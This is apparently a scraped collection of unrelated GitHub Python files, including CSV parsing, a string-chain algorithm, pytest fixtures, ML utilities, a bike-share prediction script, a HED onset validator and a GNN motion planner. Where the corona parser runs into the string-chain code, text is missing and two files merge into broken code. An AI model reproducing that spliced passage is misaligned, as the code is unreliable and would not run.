2.0)\nplt.plot(times, valB, 'b-', linewidth = 2.0)\nplt.ticklabel_format(style=\"plain\")\nplt.show()","repo_name":"crackjaw/botty","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70144401193","text":"import csv\ncases2 = list()\nwith open('corona.csv', newline='') as csvfile:\n spamreader = csv.reader(csvfile, delimiter=' ', quotechar='|')\n for row in spamreader:\n cases=row[0].split(',')\n while (\"\" in cases):\n cases.remove(\"\")\n try:\n cases2.append(cases[4])\n except:\n print(\"\")\n i = 1\n new_list = list()\n while(i len(longestSubset):\n longestSubset = j\n else:\n continue\n return longestSubset\ndef longestChain(arr):\n maxWord = ''\n for i in arr :\n if len(i) == 1:\n continue\n longestSubset = findSubset(arr, i)\n while len(longestSubset): \n if len(longestSubset) > len(maxWord):\n maxWord = longestSubset\n longestSubset = findSubset(arr,longestSubset)\n return len(maxWord) + 1\n\ntest1 = ['a','and','an', 'bear']\ntest2 = ['a','b','ba','bca','bda', 'bdca']\ntest3 = ['a', '']\n\nprint(longestChain(test3))","repo_name":"obiofiong/Python-algorithms-and-data-structures","sub_path":"practices/stringChains.py","file_name":"stringChains.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"27845284050","text":"import pytest\r\n\r\n'''To run test - python -m py.test'''\r\n\r\n@pytest.fixture\r\ndef connect(param1):\r\n\t# Setup\r\n\tyield param1\r\n\t# Cleanup\r\n\r\n\r\n@pytest.fixture\r\ndef upload(param2):\r\n\t# Setup\r\n\tyield param2\r\n\t# Cleanup\r\n\r\n\r\n@pytest.fixture\r\ndef create_setup(connect, upload):\r\n\t# Setup\r\n\tyield connect + \" \" + upload\r\n\t# Cleanup\r\n\r\n\r\nsetups = {\r\n\t\"v1.0\": [\r\n\t\t\t\"Hello\",\r\n\t\t\t\"World\",\r\n\t\t],\r\n\t\"v2.1\": [\r\n\t\t\t\"Good\",\r\n\t\t\t\"Day\",\r\n\t\t],\r\n}\r\n\r\n\r\ndef pytest_generate_tests(metafunc):\r\n\tif \"create_setup\" in metafunc.fixturenames:\r\n\t\targnames = [\"param1\", \"param2\"]\r\n\t\targvalues = [setups[v] for v in setups]\r\n\t\tids = [v for v in setups]\r\n\t\tmetafunc.parametrize(argnames, argvalues, 
ids=ids)\r\n","repo_name":"gegiti/pytest","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30183945838","text":"import re\nimport os\nimport json\nimport time\nimport math\nimport torch\nimport pickle\nimport shutil\nimport random\nimport string\nimport hashlib\nimport pathlib\n\nimport numpy as np\nimport pandas as pd\n\nfrom bs4 import BeautifulSoup\nfrom PIL import Image, ImageFont, ImageDraw, ImageColor\nfrom nltk import corpus\nfrom torch import nn\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data.sampler import SubsetRandomSampler\nfrom torchvision import models\nfrom torchvision import datasets\nfrom torchvision import transforms \n\nfrom sklearn.model_selection import train_test_split\n\nfrom datetime import datetime, timedelta\nfrom collections import defaultdict\n\n\ndef get_system_time():\n return str(time.time()).split(\".\")[0]\n\n\ndef get_current_time():\n return datetime.now().strftime(\"%Y-%m-%d_%H:%M:%S\")\n\n\ndef save_text_file(record_list, filename):\n result = \"\"\n for record in record_list:\n result += f\"{record}\\n\"\n\n with open(filename, \"w\") as fp: fp.write(result)\n\n\ndef load_text_file(filename):\n if not pathlib.Path(filename).exists(): \n print(\"FILE NOT EXISTENT\")\n return None\n\n with open(filename, \"r\", errors=\"ignore\") as fp:\n return fp.readlines()\n\n\ndef save_json_file(record_list, filename):\n result = \"\"\n for record in record_list:\n result += \"%s\\n\" % json.dumps(record)\n \n with open(filename, \"w\") as fp: fp.write(result)\n\n\ndef load_json_file(filename):\n record_list = list()\n with open(filename, \"r\", errors=\"ignore\") as fp:\n for line in fp.readlines():\n record_list.append(json.loads(line))\n \n return record_list\n\n\ndef save_pickle_file(data, filename):\n with open(filename, \"wb\") as fp:\n pickle.dump(data, fp)\n\n\ndef load_pickle_file(filename):\n data = None\n with open(filename, \"rb\") as fp:\n data = pickle.load(fp)\n\n return data\n\n\ndef get_line_cnt(path):\n cnt = None\n with open(path, \"r\", errors=\"ignore\") as fp:\n cnt = len(fp.readlines())\n return cnt\n\n\ndef create_directories(path_list):\n # path_list: a list of paths in the current directory in string format\n for path in path_list:\n pathlib.Path(path).mkdir(parents=True, exist_ok=True)\n\n\ndef remove_directories(path_list):\n # path_list: a list of paths in the current directory in string format\n for path in path_list:\n if os.path.exists(path): shutil.rmtree(path)\n\n\n\ndef print_long_text(text, max_char=50):\n cnt = 0\n result = \"\"\n for token in re.split(r\"\\s+\", text):\n cnt += len(token)\n result += token + \" \"\n if cnt >= max_char:\n cnt = 0\n result += \"\\n\"\n \n print(result)\n\n\ndef print_k_per_line(lst, k=5):\n result = \"\"\n for idx, item in enumerate(lst):\n result += f\"{item}, \"\n if (idx + 1) % k == 0:\n print(result)\n result = \"\"\n print(result)\n\n\ndef convert_text_to_shake(text):\n return hashlib.shake_128(bytes(text, encoding=\"raw_unicode_escape\")).hexdigest(5)\n\n\ndef generate_random_string(k):\n return \"\".join(random.sample(string.punctuation + string.ascii_letters + \" \", k))\n\n\ndef generate_random_sentence():\n lst = [\" \".join(tokens) for tokens in corpus.gutenberg.sents('shakespeare-macbeth.txt') if len(tokens) >= 10]\n return random.choice(lst)\n\n\ndef print_tuple(tuple_list, max_char_length=50):\n # extended version of 
print_triplet() that accepts tuple of any length\n # tuple_list: [(a1, b1, c1, d1,...), (a2, b2, c2, d2,...), ...]\n\n # if any of the tuple has more than n_token tokens, ignore extra tokens\n n_token = min(map(len, tuple_list))\n token_list_dict = defaultdict(list)\n\n length = 0\n full_string = \"\"\n string_format = \"\"\n for tup in tuple_list: \n # length \n max_len = max(map(len, tup))\n length += max_len\n\n # print format\n string_format += \"{:<%d\" % (max_len + 2) + \"}\"\n\n for i in range(n_token): token_list_dict[i].append(tup[i])\n\n if length >= max_char_length:\n # append\n for token_list in token_list_dict.values():\n full_string += \"%s\\n\" % string_format.format(*token_list)\n full_string += \"\\n\"\n\n # reset\n length = 0\n string_format = \"\"\n token_list_dict = defaultdict(list)\n \n # when remaining tokens is shorter than max_char_length, append remaining tokens\n for token_list in token_list_dict.values():\n full_string += \"%s\\n\" % string_format.format(*token_list)\n\n print(full_string)\n\n\n# in case the transformers.trainer_utils do not have this function\ndef get_last_checkpoint(folder):\n PREFIX_CHECKPOINT_DIR = \"checkpoint\"\n _re_checkpoint = re.compile(r\"^\" + PREFIX_CHECKPOINT_DIR + r\"\\-(\\d+)$\")\n\n content = os.listdir(folder)\n checkpoints = [\n path\n for path in content\n if _re_checkpoint.search(path) is not None and os.path.isdir(os.path.join(folder, path))\n ]\n if len(checkpoints) == 0:\n return\n return os.path.join(folder, max(checkpoints, key=lambda x: int(_re_checkpoint.search(x).groups()[0])))\n\n\ndef get_folder_name(path, n_digit=3):\n pattern =\"\\d{\" + f\"{n_digit}\" + \"}\"\n folders = [folder.name for folder in filter(lambda folder: folder.is_dir() and re.match(pattern, folder.name),\n list(pathlib.Path(path).glob(\"*\")))]\n \n max_folder_number = 0\n if folders: max_folder_number = max([int(folder.lstrip(\"0\")) for folder in folders])\n\n return str(max_folder_number + 1).zfill(3)\n\ndef get_latest_file(folder):\n current_time = time.time()\n filename_dict = {\n filename: current_time - float(filename.stem) for filename in folder.glob(\"*.json\")\n if filename.stem.isdigit() and not os.path.isdir(filename)\n }\n\n latest_file = min(filename_dict, key=filename_dict.get) if filename_dict != dict() else None\n\n return latest_file\n\n####################################################################################################\n\ndef parse_termcolor_color(text):\n # termcolor only supports limited number of colors (https://pypi.org/project/termcolor/)\n # the colors are specified by syntax: \\x1b[3m\\x1b[0m, where idx refers to a color\n\n prefix_pattern = \"\\\\x1b\\[3(\\d)m\"\n suffix_pattern = \"\\\\x1b\\[0m\"\n\n colors = ['grey', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white']\n\n try:\n search_result = re.search(prefix_pattern, text)\n color = ImageColor.getrgb(colors[int(search_result[1])])\n except Exception:\n color = (0, 0, 0)\n\n for pattern in [prefix_pattern, suffix_pattern]: text = re.sub(pattern, \"\", text)\n \n return text, color\n\n\ndef convert_text_to_image(textfile_path):\n # adapated from: https://stackoverflow.com/a/29775654/7784797\n # usage:\n # path = random.choice(list(pathlib.Path(\"data/\").glob(\"*.txt\")))\n # image = convert_text_to_image(path)\n # image.show()\n # image.save('content.png')\n\n PIL_GRAYSCALE = 'L'\n PIL_RGB = \"RGB\"\n PIL_WIDTH_INDEX = 0\n PIL_HEIGHT_INDEX = 1\n\n with open(textfile_path) as f:\n lines = tuple(line.rstrip() for line in f.readlines())\n\n 
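# Prefer a monospaced TrueType face so column alignment in the source text\n    # survives rendering; fall back to PIL's built-in bitmap font when\n    # DejaVuSansMono.ttf is not installed on the host.\n    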
try:\n font = ImageFont.truetype(\"DejaVuSansMono.ttf\", size=20)\n except IOError:\n font = ImageFont.load_default()\n\n # make a sufficiently sized background image based on the combination of font and lines\n font_points_to_pixels = lambda pt: round(pt * 96.0 / 72)\n margin_pixels = 20\n\n # height of the background image\n tallest_line = max(lines, key=lambda line: font.getsize(line)[PIL_HEIGHT_INDEX])\n max_line_height = font_points_to_pixels(font.getsize(tallest_line)[PIL_HEIGHT_INDEX])\n realistic_line_height = max_line_height * 0.8 # apparently it measures a lot of space above visible content\n image_height = int(math.ceil(realistic_line_height * len(lines) + 2 * margin_pixels))\n\n # width of the background image\n widest_line = max(lines, key=lambda s: font.getsize(s)[PIL_WIDTH_INDEX])\n max_line_width = font_points_to_pixels(font.getsize(widest_line)[PIL_WIDTH_INDEX])\n image_width = int(math.ceil(max_line_width + (2 * margin_pixels)))\n\n # draw the background\n # background_color = 255 # white\n # image = Image.new(PIL_GRAYSCALE, (image_width, image_height), color=background_color)\n \n background_color = (255, 255, 255)\n image = Image.new(PIL_RGB, (image_width, image_height), color=background_color)\n draw = ImageDraw.Draw(image)\n\n # draw each line of text\n horizontal_position = margin_pixels\n\n for i, line in enumerate(lines):\n vertical_position = int(round(margin_pixels + (i * realistic_line_height)))\n\n # NOTE: 15 is a magic number here\n line = line.replace(\"\\t\", \" \" * 8)\n start_position = horizontal_position + 15 * (len(line) - len(line.lstrip()))\n\n text, font_color = parse_termcolor_color(line)\n\n # specify color: https://pillow.readthedocs.io/en/stable/reference/ImageDraw.html#colors\n draw.text((start_position, vertical_position), text.strip(), fill=font_color, font=font)\n\n return image\n\n####################################################################################################\n\ndef set_pandas_display(max_colwidth=100):\n pd.options.display.max_rows = None\n pd.options.display.max_colwidth = max_colwidth\n pd.options.display.max_columns = None\n\n\n####################################################################################################\n\ndef preprocess_text(text):\n # remove links\n pattern = re.compile(r'https?://\\S+|www\\.\\S+')\n text = pattern.sub(r'', text)\n\n # remove stop words\n pattern = re.compile(r'\\b(' + r'|'.join(corpus.stopwords.words('english')) + r')\\b\\s*')\n text = pattern.sub(r'', text)\n\n # remove emojis\n pattern = re.compile(\"[\"\n u\"\\U0001F600-\\U0001F64F\"\n u\"\\U0001F300-\\U0001F5FF\"\n u\"\\U0001F680-\\U0001F6FF\"\n u\"\\U0001F1E0-\\U0001F1FF\"\n u\"\\U00002702-\\U000027B0\"\n u\"\\U000024C2-\\U0001F251\"\n \"]+\", flags=re.UNICODE)\n text = pattern.sub(r'', text)\n\n # remove HTML tags\n text = BeautifulSoup(text, \"lxml\").get_text()\n\n # remove speacial characters (for example, punctuations)\n text = re.sub(r\"[^a-zA-Z\\d]\", \" \", text)\n\n # remove extra spaces\n text = re.sub(' +', ' ', text)\n\n # remove space at the beginning and the end\n text = text.strip()\n\n return text\n\n\ndef update_json_options(filename, option_dict):\n with open(filename, \"r\") as fp:\n data = json.load(fp)\n\n for key in option_dict.keys():\n if key not in data.keys(): continue\n data[key] = option_dict[key]\n \n with open(filename, \"w\") as fp:\n json.dump(data, fp, indent=4, sort_keys=True)\n\n\ndef seed_everything(seed=42):\n os.environ[\"PYTHONHASHSEED\"] = str(seed)\n\n np.random.seed(seed)\n 
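# Seed every generator the stack touches: NumPy above, then Python's random\n    # module and torch's CPU/CUDA generators below. Note that cudnn.benchmark\n    # is left True at the end, so cuDNN may still autotune kernels and add\n    # some run-to-run variance despite the deterministic flag.\n    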
random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n \n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = True\n\n\ndef load_image_dataloader(name=\"mnist\", size=100, batch_size=8):\n transform = transforms.Compose([transforms.ToTensor()])\n\n if name == \"mnist\":\n dataset = datasets.MNIST(\".\", download=True, train=True, transform=transform)\n if name == \"cifar10\":\n dataset = datasets.CIFAR10(\".\", download=True, train=True, transform=transform)\n\n train_idx, val_idx = train_test_split(\n np.random.choice(np.arange(len(dataset)), size),\n test_size=0.2, \n shuffle=True\n )\n train_sampler = SubsetRandomSampler(train_idx)\n val_sampler = SubsetRandomSampler(val_idx)\n\n train_dataloader = DataLoader(dataset, batch_size=batch_size, shuffle=False, sampler=train_sampler)\n val_dataloader = DataLoader(dataset, batch_size=batch_size, shuffle=False, sampler=val_sampler)\n \n\n return train_dataloader, val_dataloader\n\n\ndef load_dummy_network(num_input=784, num_class=10):\n return nn.Sequential(\n nn.Linear(num_input, 100),\n nn.ReLU(),\n nn.Linear(100, num_class)\n )\n\n\ndef show_file_change(filename):\n delta = timedelta(seconds=time.time() - os.stat(filename).st_mtime)\n print(\"The file {} was updated {} seconds ago\".format(filename, delta.seconds))\n\n####################################################################################################\n# latex related\n\ndef limit_length(text, max_len=30):\n output = \"\"\n for i in range(0, len(text), max_len):\n output = output + \"\\\\\\\\ \" + text[i:i+max_len]\n \n output = \"\\makecell[l]{\" + output.strip(\"\\\\\\\\\") + \"}\"\n return output\n\n\ndef make_cell(text1, text2, max_len=None):\n if max_len:\n text1 = limit_length(text1, max_len)\n text2 = limit_length(text2, max_len)\n\n return r\"\\begin{tabular}{@{}l@{}}\" + f\"{text1}\" + r\"\\\\\" + f\"{text2}\" + r\"\\end{tabular}\"\n\n\ndef escape_chars(text):\n chars = [\"$\", \"_\", \"{\", \"}\", \"%\"]\n for c in chars: text = text.replace(c, f\"{c}\")\n\n return text","repo_name":"guanqun-yang/testaug","sub_path":"utils/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":13123,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"13722108944","text":"#Jordan Makansi\r\n#CE 263N - Bike_share Analysis\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom sklearn.tree import DecisionTreeRegressor\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn import linear_model\r\nimport csv\r\n\r\n# Get training data\r\ntrn_data = np.genfromtxt('midterm_train.csv', delimiter=',', skiprows=1, usecols=(1,2,3,4,5,6,7,8,9,10,11,12))\r\nyear_trn = trn_data[:,0].T\r\nmonth_trn = trn_data[:,1].T\r\nhour_trn = trn_data[:,2].T\r\nholiday_trn = trn_data[:,3].T\r\nweekday_trn= trn_data[:,4].T\r\nworking_trn = trn_data[:,5].T\r\nweather_type_trn = trn_data[:,6].T\r\ntemp_trn = trn_data[:,7].T\r\nfeels_like_trn = trn_data[:,8].T\r\nhumidity_trn = trn_data[:,9].T\r\nwindspeed_trn = trn_data[:,10].T\r\ncount_trn = trn_data[:,11]\r\n\r\n# Get testing data\r\ntest_data = np.genfromtxt('midterm_test.csv', delimiter=',', skiprows=1, usecols=(1,2,3,4,5,6,7,8,9,10,11))\r\nyear_test = test_data[:,0].T\r\nmonth_test = test_data[:,1].T\r\nhour_test = test_data[:,2].T\r\nholiday_test = test_data[:,3].T\r\nweekday_test= test_data[:,4].T\r\nworking_test = test_data[:,5].T\r\nweather_type_test = 
test_data[:,6].T\r\ntemp_test = test_data[:,7].T\r\nfeels_like_test = test_data[:,8].T\r\nhumidity_test = test_data[:,9].T\r\nwindspeed_test = test_data[:,10].T\r\n\r\n#Prediction 1 - Effect of Temperature, Humidity, Windspeed (6,7,8,9,10)\r\ntrn = trn_data[:,[6,7,8,9,10]]\r\nclf = DecisionTreeRegressor(max_depth=5, min_samples_leaf=5)\r\nclf.fit(trn,count_trn)\r\n\r\nneigh = KNeighborsClassifier(n_neighbors=10, weights='distance')\r\ntrn = trn_data[:,[8,9]]\r\ntest = test_data[:,[8,9]]\r\nneigh.fit(trn, count_trn)\r\npredict_1 = neigh.predict(test)\r\n\r\n#Prediction 2 - Effect of hour, weekday/weekend (2,4)\r\ntrn = trn_data[:,[2,4,11]]\r\ntest = test_data[:,[2,4]]\r\npredict_2 = []\r\ncluster_centers = []\r\n\r\n# For each hour, create a list of the counts \r\n\r\nfor hour in range(24):\r\n x=[]\r\n for row in range(len(trn)):\r\n if trn[row][0]==hour:\r\n x.append(trn[row][2])\r\n \r\n # create a K-means cluster object, with 2 clusters (weekend and weekday)\r\n k_means = KMeans(init='k-means++', n_clusters=2, n_init=10)\r\n result = k_means.fit(np.array(x)[np.newaxis].T)\r\n \r\n cluster_centers.append(k_means.cluster_centers_)\r\n\r\nfor row in range(len(test)):\r\n \r\n for hour in range(24):\r\n if test[row][0]==hour:\r\n if test[row][1]==6 or test[row][1]==7:\r\n predict_2.append(min(cluster_centers[hour][0],cluster_centers[hour][1]))\r\n else:\r\n predict_2.append(max(cluster_centers[hour][0],cluster_centers[hour][1]))\r\n\r\n#Prediction 3 - Effect of year, month (0,1)\r\ntrn = trn_data[:,[0,1,11]]\r\ntest = test_data[:,[0,1]]\r\nx=[]\r\ny=[]\r\npredict_3 = []\r\nfor month in range(1,24):\r\n if (month ==20):\r\n continue\r\n count=[]\r\n for row in range(len(trn)):\r\n if (trn[row][0]*12+trn[row][1] == month):\r\n count.append(trn[row][2])\r\n x.append([month])\r\n y.append([np.average(count)])\r\n\r\nclf = linear_model.LinearRegression()\r\nclf.fit(x,y)\r\nfor row in range(len(test)):\r\n if test[row][1]==8:\r\n predict_3.append(clf.intercept_+clf.coef_*(20))\r\n elif test[row][1]==12:\r\n predict_3.append(clf.intercept_+clf.coef_*(24))\r\n\r\n\r\n\r\n\r\n#Prediction 4 - Effect of holiday in December (3)\r\ntrn = trn_data[:,[11,1,3,5]]\r\ntest = test_data[:,[1,3,5]]\r\npredict_4 = []\r\nx=[]\r\nfor row in range(len(trn)):\r\n if trn[row][1]==12 and trn[row][2]==1:\r\n x.append(trn[row][0])\r\nk_means = KMeans(init='k-means++', n_clusters=1, n_init=10)\r\nk_means.fit(np.array(x)[np.newaxis].T)\r\ndec_hol = k_means.cluster_centers_\r\n#print dec_hol\r\nfor row in range(len(test)):\r\n if test[row][1]==1:\r\n predict_4.append(dec_hol)\r\n else:\r\n predict_4.append(0)\r\n\r\n#Weights from decision tree\r\ntrn = trn_data[:,[0,1,2,3,4,8,9,10]]\r\n\r\nclf = DecisionTreeRegressor(min_samples_leaf=5)\r\nclf.fit(trn,count_trn)\r\nweight_1 = clf.feature_importances_\r\n#print clf.feature_importances_\r\n\r\ntrn = trn_data[:,[0,1,2,4,8,9,10]]\r\nclf = DecisionTreeRegressor(min_samples_leaf=5)\r\nclf.fit(trn,count_trn)\r\nweight_2 = clf.feature_importances_\r\n\r\n# ----------------- UP TO HERE ----------------------------\r\n\r\n#Final prediction\r\ntest = test_data[:,[0,1,2,3,4,5,6,7,8,9,10]]\r\ncount_predict = []\r\nfor row in range(len(test)):\r\n if test[row][3]==1:\r\n count_predict.append(predict_1[row]*(weight_1[5]+weight_1[6]+weight_1[7])+predict_2[row]*(weight_1[2]+weight_1[4])+predict_3[row]*(weight_1[0]+weight_1[1])+predict_4[row]*weight_1[3])\r\n else:\r\n 
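# Non-holiday rows: the holiday sub-model (predict_4) is skipped and the\r\n        # three remaining predictors are blended with weight_2, the importances\r\n        # refit without the holiday feature.\r\n        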
count_predict.append(predict_1[row]*(weight_2[4]+weight_2[5]+weight_2[6])+predict_2[row]*(weight_2[2]+weight_2[3])+predict_3[row]*(weight_2[0]+weight_2[1]))\r\n\r\n\r\n#Writing to a file\r\ndate = []\r\nwith open('midterm_test.csv','rb') as f:\r\n next(f)\r\n csvreader = csv.reader(f,delimiter = ',')\r\n for row in csvreader:\r\n date.append(row[0])\r\nf.close()\r\nhour = np.genfromtxt('midterm_test.csv', delimiter=',', skiprows=1, usecols=(3))\r\nwith open('prediction1.csv','w') as f:\r\n f.write(\"date,hour,count\\n\")\r\n for i in range(len(count_predict)):\r\n f.write(\"%s,%f,%f\\n\" % (date[i],hour[i],round(count_predict[i])))\r\n f.close()\r\n\r\n###### -------- DEBUGGING BREAK HERE ----\r\nimport sys\r\nsys.exit()\r\n","repo_name":"makansij/Data_Analysis","sub_path":"Final_Analysis_original.py","file_name":"Final_Analysis_original.py","file_ext":"py","file_size_in_byte":5277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26054532222","text":"from hed.models.model_constants import DefTagNames\nfrom hed.models.hed_group import HedTag, HedGroup\nfrom hed.errors.error_reporter import ErrorHandler\nfrom hed.errors.error_types import OnsetErrors\n\n\nclass OnsetMapper:\n \"\"\"\n Validator responsible for matching onset offset pairs up\n \"\"\"\n\n def __init__(self, def_mapper):\n self._def_mapper = def_mapper\n self._onsets = {}\n\n def check_for_onset_offset(self, hed_string_obj):\n \"\"\"\n Checks for an onset or offset tag in the given string and adds it to the current context if found.\n Parameters\n ----------\n hed_string_obj : HedString\n The hed string to check. Finds a maximum of one onset tag.\n\n Returns\n -------\n onset_issues: [{}]\n Issues found validating onsets. Out of order onsets, unknown def names, etc.\n \"\"\"\n onset_issues = []\n for found_onset, found_group in self._find_onset_tags(hed_string_obj):\n if not found_onset:\n return []\n\n def_tags, def_groups = self._find_def_tags(found_group)\n if not def_tags:\n onset_issues += ErrorHandler.format_error(OnsetErrors.ONSET_NO_DEF_TAG_FOUND, found_onset)\n continue\n\n if len(def_tags) > 1:\n onset_issues += ErrorHandler.format_error(OnsetErrors.ONSET_TOO_MANY_DEFS,\n tag=def_tags[0],\n tag_list=[tag for tag in def_tags[1:]])\n continue\n\n def_tag = def_tags[0]\n def_group = def_groups[0]\n children = [child for child in found_group.get_direct_children() if\n def_group != child and found_onset != child]\n max_children = 1\n if found_onset.short_base_tag.lower() == DefTagNames.OFFSET_KEY:\n max_children = 0\n if len(children) > max_children:\n onset_issues += ErrorHandler.format_error(OnsetErrors.ONSET_WRONG_NUMBER_GROUPS,\n def_tag,\n found_group.get_direct_children())\n continue\n\n if children:\n # Make this a loop if max_children can be > 1\n child = children[0]\n if not isinstance(child, HedGroup):\n onset_issues += ErrorHandler.format_error(OnsetErrors.ONSET_TAG_OUTSIDE_OF_GROUP,\n child,\n def_tag)\n\n # At this point we have either an onset or offset tag and it's name\n onset_issues += self._handle_onset_or_offset(def_tag, found_onset)\n\n return onset_issues\n\n def _find_onset_tags(self, hed_string_obj):\n for group in hed_string_obj.groups():\n for tag in group.tags():\n if tag.short_base_tag.lower() == DefTagNames.ONSET_KEY \\\n or tag.short_base_tag.lower() == DefTagNames.OFFSET_KEY \\\n and not tag.extension_or_value_portion:\n yield tag, group\n # only return one onset tag per group\n break\n\n def _find_def_tags(self, onset_group):\n 
def_tags = []\n def_groups = []\n for child in onset_group.get_direct_children():\n if isinstance(child, HedTag):\n if child.short_base_tag.lower() == DefTagNames.DEF_KEY:\n def_tags.append(child)\n def_groups.append(child)\n else:\n for tag in child.tags():\n if tag.short_base_tag.lower() == DefTagNames.DEF_EXPAND_KEY:\n def_tags.append(tag)\n def_groups.append(child)\n\n return def_tags, def_groups\n\n def _handle_onset_or_offset(self, def_tag, onset_offset_tag):\n is_onset = onset_offset_tag.short_base_tag.lower() == DefTagNames.ONSET_KEY\n full_def_name = def_name = def_tag.extension_or_value_portion\n placeholder = None\n found_slash = def_name.find(\"/\")\n if found_slash != -1:\n placeholder = def_name[found_slash + 1:]\n def_name = def_name[:found_slash]\n\n def_entry = self._def_mapper.get_def_entry(def_name)\n if def_entry is None:\n return ErrorHandler.format_error(OnsetErrors.ONSET_DEF_UNMATCHED, tag=def_tag)\n if bool(def_entry.takes_value) != bool(placeholder):\n return ErrorHandler.format_error(OnsetErrors.ONSET_PLACEHOLDER_WRONG, tag=def_tag,\n has_placeholder=bool(def_entry.takes_value))\n\n if is_onset:\n # onset can never fail as it implies an offset\n self._onsets[full_def_name.lower()] = full_def_name\n else:\n if full_def_name.lower() not in self._onsets:\n return ErrorHandler.format_error(OnsetErrors.OFFSET_BEFORE_ONSET, tag=def_tag)\n else:\n del self._onsets[full_def_name.lower()]\n\n return []\n\n def __get_string_ops__(self, **kwargs):\n string_validators = []\n string_validators.append(self.check_for_onset_offset)\n return string_validators\n\n def __get_tag_ops__(self, **kwargs):\n return []\n","repo_name":"hed-standard/hed2-python","sub_path":"hed2tools/hed/models/onset_mapper.py","file_name":"onset_mapper.py","file_ext":"py","file_size_in_byte":5473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23278234421","text":"import json\nfrom pprint import pprint\n\nif __name__ == '__main__':\n\n with open('data.json') as data_file:\n data = json.load(data_file)\n\n test = {\"Name\": 1, \"Test\": 2}\n\n for value in data[\"textAnnotations\"]:\n # description field is the identified word\n pprint(value[\"description\"])\n # boundingPoly/vertices gives the coordinates\n pprint(value[\"boundingPoly\"][\"vertices\"])\n","repo_name":"vhartman/ILikeFridgesBack","sub_path":"ocr/playground.py","file_name":"playground.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"12408686673","text":"import torch\nfrom planner.learned_planner import LearnedPlanner\nfrom utils.utils import seed_everything, create_dot_dict, to_np\nfrom utils.graphs import knn_graph_from_points\n\nfrom planner.learned.model.GNN_static import GNNet\n\nfrom torch_sparse import coalesce\nfrom torch_geometric.nn import knn_graph\nfrom torch_geometric.data import Data\n\nfrom tqdm import tqdm as tqdm\nimport numpy as np\n\n\nclass GNNStaticPlanner(LearnedPlanner):\n def __init__(self, num_batch, model_args, k_neighbors=50, **kwargs):\n self.num_batch = num_batch\n self.model = GNNet(**model_args)\n self.k_neigbors = k_neighbors\n self.num_node = 0\n\n super(GNNStaticPlanner, self).__init__(self.model, **kwargs)\n self.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n self.model.to(self.device)\n\n def _num_node(self):\n return self.num_node\n\n def _plan(self, env, start, goal, timeout, seed=0, **kwargs):\n\n 
seed_everything(seed=seed)\n self.model.eval()\n path = self._explore(env, start, goal, self.model, timeout, k=self.k_neigbors, n_sample=self.num_batch)\n\n return create_dot_dict(solution=path if len(path) else None)\n\n def create_graph(self):\n graph_data = knn_graph_from_points(self.points, self.k_neighbors)\n self.edges = graph_data.edges\n self.edge_index = graph_data.edge_index\n self.edge_cost = graph_data.edge_cost\n\n def create_data(self, points, obstacles, edge_index=None, k=50):\n goal_index = 1\n data = Data(goal=torch.FloatTensor(points[goal_index]))\n data.v = torch.FloatTensor(np.array(points))\n data.obstacles = torch.FloatTensor()\n\n if edge_index is not None:\n data.edge_index = torch.tensor(edge_index.T).to(self.device)\n else:\n # k1 = int(np.ceil(k * np.log(len(points)) / np.log(100)))\n edge_index = knn_graph(torch.FloatTensor(data.v), k=k, loop=True)\n edge_index = torch.cat((edge_index, edge_index.flip(0)), dim=-1)\n ### bi-directional graph\n data.edge_index, _ = coalesce(edge_index, None, len(data.v), len(data.v))\n\n # create labels\n labels = torch.zeros(len(data.v), 1)\n labels[goal_index, 0] = 1\n data.labels = labels\n\n return data\n \n @torch.no_grad()\n def _explore(self, env, start, goal, model_gnn, timeout, k, n_sample, loop=10):\n success = False\n path = []\n points = [start] + [goal] + env.robot.sample_n_free_points(n_sample) \n\n explored = [0]\n explored_edges = [[0, 0]]\n prev = {0: 0}\n\n while not success:\n\n data = self.create_data(points, env.get_obstacles(), k=k)\n self.num_node = len(data.v)\n policy = model_gnn(**data.to(self.device).to_dict(), loop=loop)\n policy = policy.cpu()\n\n policy[torch.arange(len(data.v)), torch.arange(len(data.v))] = 0\n policy[:, explored] = 0\n policy[np.array(explored_edges).reshape(2, -1)] = 0\n\n while policy[explored, :].sum() != 0:\n\n agent = policy[np.array(explored)[torch.where(policy[explored, :] != 0)[0]], torch.where(policy[explored, :] != 0)[1]].argmax()\n end_a, end_b = torch.where(policy[explored, :] != 0)[0][agent], torch.where(policy[explored, :] != 0)[1][agent]\n end_a, end_b = int(end_a), int(end_b)\n end_a = explored[end_a]\n explored_edges.extend([[end_a, end_b], [end_b, end_a]])\n if env.edge_fp(to_np(data.v[end_a]), to_np(data.v[end_b])):\n explored.append(end_b)\n prev[end_b] = end_a\n\n policy[:, end_b] = 0\n if end_b==1:\n success = True\n path = [end_b]\n node = end_b\n while node != 0:\n path.append(prev[node])\n node = prev[node]\n path.reverse()\n break\n else:\n policy[end_a, end_b] = 0\n policy[end_b, end_a] = 0\n\n self.check_timeout(timeout)\n\n if not success:\n # ----------------------------------------resample----------------------------------------\n new_points = env.sample_n_points(n_sample, need_negative=True)\n points = points + list(new_points)\n \n return 